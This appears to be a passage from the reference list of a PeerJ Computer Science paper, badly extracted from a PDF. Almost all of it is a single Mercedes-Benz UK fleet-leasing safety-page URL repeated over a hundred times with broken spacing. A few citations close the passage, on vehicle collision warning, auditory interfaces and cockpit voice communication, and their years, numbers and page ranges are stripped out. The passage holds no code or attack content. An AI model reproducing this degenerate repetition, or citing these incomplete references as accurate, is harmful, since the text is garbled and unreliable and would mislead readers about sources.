.mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://dx.doi.org/ . /peerj-cs. miller r, huang q. . an adaptive peer-to-peer collision warning system. in: proceedings of the ieee th vehicular technology conference, , birmingham, al. – . mynatt ed. . auditory presentation of graphical user interfaces. available at https://smartech. gatech.edu/bitstream/handle/ / / - .pdf (accessed july ). nixon cw, morris lj, mccavitt ar, mckinley rl, anderson tr, mcdaniel mp, yeager dg. a. female voice communications in high levels of aircraft cockpit 